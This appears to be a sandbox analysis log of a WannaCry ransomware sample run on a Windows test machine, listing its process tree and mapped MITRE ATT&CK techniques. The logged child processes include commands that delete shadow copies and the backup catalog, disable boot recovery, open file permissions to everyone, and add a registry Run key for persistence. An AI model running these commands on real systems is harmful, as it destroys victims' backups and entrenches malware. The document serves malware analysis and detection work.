- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1860 -prefMapHandle 1848 -prefsLen 24530 -prefMapSize 245025 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3428ad1-cbd1-434e-aea9-c616e0d12aea} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" gpu
    3⤵
    PID:4880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20240401114208 -prefsHandle 2292 -prefMapHandle 2280 -prefsLen 24530 -prefMapSize 245025 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b28255f-f45a-4fae-8a31-ea4d7e774b60} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" socket
    3⤵
    - Checks processor information in registry
    PID:2376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 2560 -prefMapHandle 3092 -prefsLen 25029 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c55f92a3-f1df-4a9d-9af7-9e2c37c66078} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:1532
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -childID 2 -isForBrowser -prefsHandle 4044 -prefMapHandle 4040 -prefsLen 30262 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9ae3a24-b851-483d-8a2c-52b45fb37424} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5268
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4756 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4788 -prefMapHandle 4760 -prefsLen 30316 -prefMapSize 245025 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {271eb574-fe3c-48aa-a084-4951322ebc21} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" utility
    3⤵
    - Checks processor information in registry
    PID:4828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 3 -isForBrowser -prefsHandle 5240 -prefMapHandle 5248 -prefsLen 27782 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d4f9301-7bcb-4f2b-a0ff-1e574f5e30f8} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:3964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 4 -isForBrowser -prefsHandle 5492 -prefMapHandle 5496 -prefsLen 27782 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e066b78-d064-4eeb-b231-6ac347721db7} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:2548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 5 -isForBrowser -prefsHandle 5624 -prefMapHandle 5632 -prefsLen 27782 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac2f38ac-b5ce-4326-9fad-1a17e8f4a5c1} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 6 -isForBrowser -prefsHandle 5936 -prefMapHandle 5924 -prefsLen 27782 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1986e12-f2c4-4f73-bfd3-1f57c7aa9609} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4964 -childID 7 -isForBrowser -prefsHandle 2952 -prefMapHandle 4648 -prefsLen 28076 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {598f1b5b-a253-415d-902c-143314d889d9} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6524 -childID 8 -isForBrowser -prefsHandle 6504 -prefMapHandle 5504 -prefsLen 28076 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c5db2fa-3be2-4572-bd6c-0c83e2d7d612} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5232
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6596 -childID 9 -isForBrowser -prefsHandle 6776 -prefMapHandle 6676 -prefsLen 28076 -prefMapSize 245025 -jsInitHandle 1440 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fd89ca5-8967-4919-867f-df789f74ac83} 1832 "\\.\pipe\gecko-crash-server-pipe.1832" tab
    3⤵
    PID:5676

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\WannaCrypt0r\" -spe -an -ai#7zMap14717:82:7zEvent29
1⤵
PID:6048

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6012
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1864 -prefsLen 24856 -prefMapSize 245077 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5778b9fe-db25-42a1-943b-58f667cc312d} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" gpu
    3⤵
    PID:4864
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20240401114208 -prefsHandle 2292 -prefMapHandle 2288 -prefsLen 24856 -prefMapSize 245077 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2473370-0f55-428c-a716-29fd76ea118b} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" socket
    3⤵
    PID:5492
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3100 -childID 1 -isForBrowser -prefsHandle 3264 -prefMapHandle 3068 -prefsLen 25355 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5cabdfc-1abe-4169-9334-b1032b6aa286} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:3736
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3852 -childID 2 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 30588 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b6c0aab-7f4f-47ec-950f-e4028ce94f01} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:5668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4400 -childID 3 -isForBrowser -prefsHandle 4412 -prefMapHandle 4408 -prefsLen 27920 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f828b6b1-57d9-4391-bbc8-9d984413f206} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:5652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1096 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4764 -prefMapHandle 4652 -prefsLen 30588 -prefMapSize 245077 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dcc7ae4-8a5f-410f-804e-3ccdcb3a1a62} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" utility
    3⤵
    - Checks processor information in registry
    PID:5236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5464 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73d91519-1f17-4063-9986-8699ea1ea357} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:5820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -childID 5 -isForBrowser -prefsHandle 4468 -prefMapHandle 4484 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60ad3ffc-7023-4c9c-959a-912a1f6241eb} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:5176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 6 -isForBrowser -prefsHandle 5896 -prefMapHandle 5952 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {293c6ace-b2ec-49cb-9ded-8f3581818481} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:1408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6060 -childID 7 -isForBrowser -prefsHandle 6064 -prefMapHandle 6068 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2d39d9e-8e94-45c6-a08d-46b96596eee1} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:2404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6252 -childID 8 -isForBrowser -prefsHandle 6260 -prefMapHandle 6264 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a85eaf75-e5dc-4f51-9727-2a620fe6fc1d} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:1288
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6584 -childID 9 -isForBrowser -prefsHandle 6656 -prefMapHandle 6652 -prefsLen 27974 -prefMapSize 245077 -jsInitHandle 1476 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed85b0b3-55a7-4bf7-99d9-d9df90a2682a} 4384 "\\.\pipe\gecko-crash-server-pipe.4384" tab
    3⤵
    PID:1924

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\WannaCrypt0r\" -spe -an -ai#7zMap2411:82:7zEvent17373
1⤵
PID:5824

C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]
"C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]"
1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5336
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2684
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:3352
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:60
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 107071728204687.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3980
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5224
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:3608
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2736
- - C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5844
- - C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1392
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:5148
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2348
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2040
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5552
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fnnvghpejgiq616" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCrypt0r\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5512
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fnnvghpejgiq616" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCrypt0r\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4056
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3808
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4568
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2216
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5188
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3716
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5328
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5968
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3748
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5500
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5692
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3340
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2468
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:552
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3220
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4868
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5964
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3052
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5048
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4192
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1008
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5188
- C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:820
- C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:636
- C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4248

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5620

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
1⤵
PID:1316

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\e190cd8b55b343faaf2dc7ec119bd696 /t 320 /p 2916
1⤵
PID:5976

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]
"C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]"
1⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4592

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe
"C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4204

C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe
"C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3064

C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]
"C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3160
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:5536
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery